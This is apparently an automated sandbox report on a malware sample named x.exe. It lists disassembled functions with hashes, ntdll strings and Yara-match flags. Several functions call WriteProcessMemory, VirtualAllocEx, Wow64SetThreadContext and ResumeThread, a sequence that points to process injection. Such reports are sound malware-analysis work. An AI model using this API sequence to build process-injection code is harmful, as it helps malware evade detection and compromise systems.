Instruction ID: b61a39867857b3b687ae38757ab03545fa090bb370e71650f5c1a6580396f8ca
Opcode Fuzzy Hash: 103862a9e181220c2a52945d91adfbeba943b42b9ece37513401a14492120c47
Instruction Fuzzy Hash: 6841ABB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE815BB210D379AA45CF54

Function 01455E38 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01455F0B

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4ae526324dacae82258be2712791180da75feb7304014ef9479256d442406414
Instruction ID: 164b95a633ef6c21b2c4a3abdb7d4d2064f9cb5b3c819977e4f6ef77e135184c
Opcode Fuzzy Hash: 4ae526324dacae82258be2712791180da75feb7304014ef9479256d442406414
Instruction Fuzzy Hash: B6419AB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE819BB210D775AA45CF54

Function 01456088 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0145613A

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d2937cc2f05ad123b70ca41953dc0a9ef84b5872c4014bb1cd26f70ec0f46dd
Instruction ID: f07c71bb48c19abbfca04b0bf8ca0b9f0671dfc6247cac57c4e8dfc3f190579b
Opcode Fuzzy Hash: 5d2937cc2f05ad123b70ca41953dc0a9ef84b5872c4014bb1cd26f70ec0f46dd
Instruction Fuzzy Hash: 653198B9D042589FCF14CFA9D980ADEFBB1FB59310F10942AE815B7210D735A946CF54

Function 01456090 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0145613A

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0f1cfa95cfad6416d1b43f4540028d8386002757d2911e8b4943475724b48092
Instruction ID: 620500ebf343861aa0106fa5fa4959233ba21c8da96f36606627b243e6ace505
Opcode Fuzzy Hash: 0f1cfa95cfad6416d1b43f4540028d8386002757d2911e8b4943475724b48092
Instruction Fuzzy Hash: C53187B9D042589FCF10CFA9D980AEEFBB5BB49310F10942AE815B7310D735A946CF58

Function 01455BE0 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01455C8F

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c969a6edfbf0b132aa86aa547c9bc330f2024ba2bc0b5d71083634a26fa165e6
Instruction ID: a5c1907eb77fd8bbf21eae10b431d50c859ed02d56682d710f14cc9d709110c7
Opcode Fuzzy Hash: c969a6edfbf0b132aa86aa547c9bc330f2024ba2bc0b5d71083634a26fa165e6
Instruction Fuzzy Hash: CF31BBB4D002589FCB14CFA9D984AEEFBF1BB49314F14802AE418BB250C738A985CF94

Function 014561A8 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 0145622E

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ce6282b26343edced4cac0a1624ce5e8a2607ff21aa6ef8b7c9429fd518c6141
Instruction ID: dd1d984359d64a1bf920d62959668f3bf0b03614ab655aee8ff65b63f4a0e854
Opcode Fuzzy Hash: ce6282b26343edced4cac0a1624ce5e8a2607ff21aa6ef8b7c9429fd518c6141
Instruction Fuzzy Hash: FE31C9B4D012189FCB14CFA9D980AEEFBB1BB48314F24942AE819B7310C735A841CFA4

Function 014561B0 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 0145622E

Memory Dump Source

Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1450000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 31ec1d1a55fded6f4c42bb8f130809333c4a58cb2376be8754ebfad2dab4744b
Instruction ID: f5a98d8c5ee6aae0776c891caf3908c40f741818fc84554873060b8eff921c21
Opcode Fuzzy Hash: 31ec1d1a55fded6f4c42bb8f130809333c4a58cb2376be8754ebfad2dab4744b
Instruction Fuzzy Hash: 2431AAB4D012189FCF14DFA9D984ADEFBB5BB49310F10942AE815B7310C735A941CFA8

Analysis Process: x.exePID: 2596, Parent PID: 3448COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	5.7%
Signature Coverage:	5.7%
Total number of Nodes:	106
Total number of Limit Nodes:	10

Executed Functions

Function 0042BF13 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(tCB,?,00000000,?,?,00424374,?,0000B252), ref: 0042BF4A

Strings

tCB, xrefs: 0042BF41, 0042BF49

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: Close
String ID: tCB
API String ID: 3535843008-4013893092
Opcode ID: 6831eff854b14dac166e894cf006320f2323fa42a408d705fb4078735ec24ccc
Instruction ID: f5e6ebafdc0ebfe4b0213ccca7ee9e312587966a4b08d1025d04be40c9a06f07
Opcode Fuzzy Hash: 6831eff854b14dac166e894cf006320f2323fa42a408d705fb4078735ec24ccc
Instruction Fuzzy Hash: 7BE04F713012147BD610EB5ADC01FA7775CDFC5754F108119FA4867281D675791087A5

Function 00417193 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417205

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a69e7a07e3bc8e40f5efbddf74c7caad666b45ad786fb07d6a8e72fe321118df
Instruction ID: 559387bb727b7c6aff5d3b72a4b901e91eba14c75de62de551442f05a391ca76
Opcode Fuzzy Hash: a69e7a07e3bc8e40f5efbddf74c7caad666b45ad786fb07d6a8e72fe321118df
Instruction Fuzzy Hash: B8015EB5E0020DBBDF10DBE5DD42FDEB3789B54308F4081AAE90897240F675EB488BA5

Function 019C35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019C35CA

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
Instruction ID: 3339c266c4420204e4cfa94d50dfe09dd73bfae8ac9d51ff37cc169ac7a629e5
Opcode Fuzzy Hash: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
Instruction Fuzzy Hash: 6290023560561402D10071584518706505997D0201F65C411E0464568EC7958A5166A3

Function 019C2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019C2B6A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
Instruction ID: 32b65fe00499e4ff81c3b0417a4166d98108297b3e27473672d9aa1a73bb1455
Opcode Fuzzy Hash: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
Instruction Fuzzy Hash: 9090026520251003410571584418616805E97E0201B55C021E1054590EC52589916226

Function 019C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019C2DFA

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
Instruction ID: c08d561886b6c0464f8df0167ea70c49d75b589606419e154d2d0964525db4a7
Opcode Fuzzy Hash: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
Instruction Fuzzy Hash: FE90023520151413D11171584508707405D97D0241F95C412E0464558ED6568A52A222

Function 019C2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019C2C7A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
Instruction ID: ef6e9b01fee5c1c57a293d314e6ddcc7f04b09b9d885b6a3e199d36c37f05570
Opcode Fuzzy Hash: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
Instruction Fuzzy Hash: BF90023520159802D1107158840874A405997D0301F59C411E4464658EC69589917222

Function 0042C283 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2C2

Strings

^A, xrefs: 0042C286

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: ^A
API String ID: 3298025750-3251803456
Opcode ID: f121dccc94ad6ae9892e7da17d262d91c94da44102dcf713e084470555319430
Instruction ID: 031bdd33b0932c11d549b83e8758480b0afc4f3c511cd97d2edf14014a52f87e
Opcode Fuzzy Hash: f121dccc94ad6ae9892e7da17d262d91c94da44102dcf713e084470555319430
Instruction Fuzzy Hash: 36E06DB12002047FCA14EE59DC45FAB37ACEFC5710F00401AFD08A7241D674B9218AB5

Function 00417213 Relevance: 1.6, APIs: 1, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417205

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9d6f419d53a89590297ed3a95b234f59a3b5c0924cd5972a0533f6ff042c346b
Instruction ID: 57dd96bee447288efc35d123e896fe7ee341ef6ce162d769f0fe48c38f332b28
Opcode Fuzzy Hash: 9d6f419d53a89590297ed3a95b234f59a3b5c0924cd5972a0533f6ff042c346b
Instruction Fuzzy Hash: 51113D76E00109BBCB10DAA5CC41FDAF778DF55354F044296E91957281EA31FB0A8BA5

Function 0042C233 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000104,?,0042437F,?,?,0042437F,?,00000104,?,0000B252), ref: 0042C26F

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 71c9c18ba4f29dccef27266d91e5d9684fc24c9a03ce7cca5b57a564e86d0044
Instruction ID: 10d7fa9a1095ff3c565a96949568e6e081e19988bd9917dac7ddf5865f970d94
Opcode Fuzzy Hash: 71c9c18ba4f29dccef27266d91e5d9684fc24c9a03ce7cca5b57a564e86d0044
Instruction Fuzzy Hash: EEE06DB12002047FC610EE59EC42FAB77ACDFC5750F004019FA18A7281D674B9108AF8

Function 0042C2D3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042C307

Memory Dump Source

Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_x.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0d67a48d802ad302c240b2e2dd38d72597bc3adea32aab243ac96f285e047312
Instruction ID: 52fdecfce6c72926522b73fd8c83a329ac4b6b92dd680b9d8913354de3f024f8
Opcode Fuzzy Hash: 0d67a48d802ad302c240b2e2dd38d72597bc3adea32aab243ac96f285e047312
Instruction Fuzzy Hash: 96E086316002147BD210EA6ADC01FDB775CDFC5764F00801AFA0C67281D775B91487F4

Function 019C2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019C2C24

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
Instruction ID: b6b13b121cc887ce72d467063fbec4da23604204b3673ea1207d1273ab7e5eb0
Opcode Fuzzy Hash: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
Instruction Fuzzy Hash: 33B09B71D415D5C5DA11E764460C717795477D0701F15C065D2470641F4738C1D1E277

Non-executed Functions

Function 01A02349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

CFGOptions, xrefs: 01A02967
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A03176
ShutdownFlags, xrefs: 01A024A1
TracingFlags, xrefs: 01A02549
LdrpInitializeExecutionOptions, xrefs: 01A0317D
ExecuteOptions, xrefs: 01A025A0
UnloadEventTraceDepth, xrefs: 01A024C0
MaxLoaderThreads, xrefs: 01A024EC
@, xrefs: 01A02B74
MaxDeadActivationContexts, xrefs: 01A02D82
minkernel\ntdll\ldrinit.c, xrefs: 01A03187
DisableExceptionChainValidation, xrefs: 01A0275F
@, xrefs: 01A02942
GlobalFlag2, xrefs: 01A02FC0
DisableHeapLookaside, xrefs: 01A0246D
FrontEndHeapDebugOptions, xrefs: 01A02489
MinimumStackCommitInBytes, xrefs: 01A02BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 01A02579
GlobalFlag, xrefs: 01A02F3F, 01A03059
UseImpersonatedDeviceMap, xrefs: 01A0251C

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
Instruction ID: 37d749f5caca1e2b47d3fcccef930c75c7e82d275f672e853a29d513f2c50aed
Opcode Fuzzy Hash: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
Instruction Fuzzy Hash: 83929371604742AFE722CF18D884B6BB7E8BF84750F04492EFA98D7291D770E944CB92

Function 01A312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p is not last block in segment (%p), xrefs: 01A317B7
Free Heap block %p modified at %p after it was freed, xrefs: 01A3171B
Heap block at %p has incorrect segment offset (%x), xrefs: 01A3181A
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 01A3176D
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 01A318F8
HEAP: , xrefs: 01A31706, 01A31756, 01A317A8, 01A31809, 01A3184D, 01A31895, 01A318E6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 01A3186B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 01A318A5
HEAP[%wZ]: , xrefs: 01A316CD, 01A316F9, 01A31749, 01A3179B, 01A317FC, 01A31840, 01A318D9

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 5618e87123f53f98924a3b09b7e55a64b6adc3f9caf64ed519481ce74eae5d91
Instruction ID: e15a66e63a7cfc6a66ef20375e416bec50730f2df07c9be1354dedd402caa8b7
Opcode Fuzzy Hash: 5618e87123f53f98924a3b09b7e55a64b6adc3f9caf64ed519481ce74eae5d91
Instruction Fuzzy Hash: 0912A070600642DFE726CF69C445BB6BBF1FF89714F198459F49A8B682E734E881CB50

Function 0197D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0197D3E9
Control Panel\Desktop\MuiCached, xrefs: 0197D62B
PreferredUILanguages, xrefs: 0197D4B8, 0197D4C5
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0197D3B6
PreferredUILanguagesPending, xrefs: 019DA8DE
@, xrefs: 0197D663
MachinePreferredUILanguages, xrefs: 0197D685
@, xrefs: 0197D49D
Control Panel\Desktop, xrefs: 0197D45D

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 61c1ea39ff0e11eed654ad7438c84650817d9a20401abf436f8406f37ebbcd3b
Instruction ID: 8b99f22ec7206bf01a795e7d79e94602a8b769dbd3ace164cd27994c2458da61
Opcode Fuzzy Hash: 61c1ea39ff0e11eed654ad7438c84650817d9a20401abf436f8406f37ebbcd3b
Instruction Fuzzy Hash: 00B17B725083569FD721DF68C880A6BBBE8BFC8754F05492EF98DD7240D770D9488B92

Function 01A19179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 01A1946E, 01A194D6
%s\%u-%u-%u-%u, xrefs: 01A19422
\AppContainerNamedObjects, xrefs: 01A194AB, 01A194B9
\Sessions, xrefs: 01A19488
\BaseNamedObjects, xrefs: 01A1949E
BaseNamedObjects, xrefs: 01A19477, 01A1947C
%s\%ld\%s, xrefs: 01A1948D
Global\Session\%ld%s, xrefs: 01A194C5

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: c5fc3b4a37f1f44a06e7cceb465e6786a60861a55dd0b4c581550b9c543c5d46
Instruction ID: 253209e23ffc24eaaac130e9c0e0b2bf54b734bf01c024d1e4028740a02f4bad
Opcode Fuzzy Hash: c5fc3b4a37f1f44a06e7cceb465e6786a60861a55dd0b4c581550b9c543c5d46
Instruction Fuzzy Hash: 6AD1F672804312AFD721DB64C850B6BBBE8AFD4B18F44492DFA98A7154E770DD48C7E2

Function 01A30274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 01A303BA
RtlReAllocateHeap, xrefs: 01A302BF, 01A30362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A3069F
Just reallocated block at %p to %Ix bytes, xrefs: 01A305F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A306EA
HEAP: , xrefs: 01A303A6, 01A304B5, 01A305DD, 01A30682, 01A306D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A304D3
HEAP[%wZ]: , xrefs: 01A30399, 01A304A8, 01A305D0, 01A30675, 01A306CC

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
Instruction ID: 05e6bdf080efa810055a6d9e8321e5f12c5d40de61d60792208343e0a1fff95f
Opcode Fuzzy Hash: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
Instruction Fuzzy Hash: 91D1DE36600686DFDB22DF68C940BAEBBF1FFC9714F188059F48A9B252C7349A41CB54

Function 0197D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 0197D2AF
Control Panel\Desktop\LanguageConfiguration, xrefs: 0197D196
@, xrefs: 0197D0FD
@, xrefs: 0197D313
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0197D0CF
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0197D262
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0197D146
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0197D2C3

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: f6c93a2b50b627924dc673dbf26ac8c44d93cac75d33288a6ba329efc5e32ac4
Instruction ID: fea9f80c534267ab3e12f666234f3b407ffb8701b0c04f1783d164018b762417
Opcode Fuzzy Hash: f6c93a2b50b627924dc673dbf26ac8c44d93cac75d33288a6ba329efc5e32ac4
Instruction Fuzzy Hash: C1A119719083469FE721DF65C444B6BBBE8BFC4725F00892EE99C97240E774D9488B93

Function 0197F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

((LONG)FreeEntry->Size > 1), xrefs: 019DE0B3
(LONG)FreeEntry->Size > 1, xrefs: 019DE291
(!TrailingUCR), xrefs: 019DE3A9
HEAP: , xrefs: 019DDF64, 019DE0A8, 019DE286, 019DE39E
(UCRBlock != NULL), xrefs: 019DDF6F
HEAP[%wZ]: , xrefs: 019DDF57, 019DE09B, 019DE279, 019DE391

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 87020ea86fb0eeff952b1b001841c15a7a0afd2c4d3ac14b1c8e5db2d36572d5
Instruction ID: 1d3c17acd4a0908378a27cfc455d7b3b20fb94b8a1098a5cad878ac4caca568c
Opcode Fuzzy Hash: 87020ea86fb0eeff952b1b001841c15a7a0afd2c4d3ac14b1c8e5db2d36572d5
Instruction Fuzzy Hash: 5042EF312087829FD715DF28C884B6ABBE9FF84714F08896DF4AE9B252D730D945CB52

Function 0199B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

SxS, xrefs: 019E83ED
LdrpPreprocessDllName, xrefs: 019E8403, 019E84D7
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 019E84D0
minkernel\ntdll\ldrutil.c, xrefs: 019E840D, 019E84E1
API set, xrefs: 019E83F4, 019E83F9
DLL %wZ was redirected to %wZ by %s, xrefs: 019E83FC

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 54872df48a993532ba6ec0b5bf0dcae3599e78d41e066ccde87c3e9071b1f3ac
Instruction ID: 29d943b33c6f3acae7a58b1640610fe67df4b10dc8ac47248e0b0a921102dec4
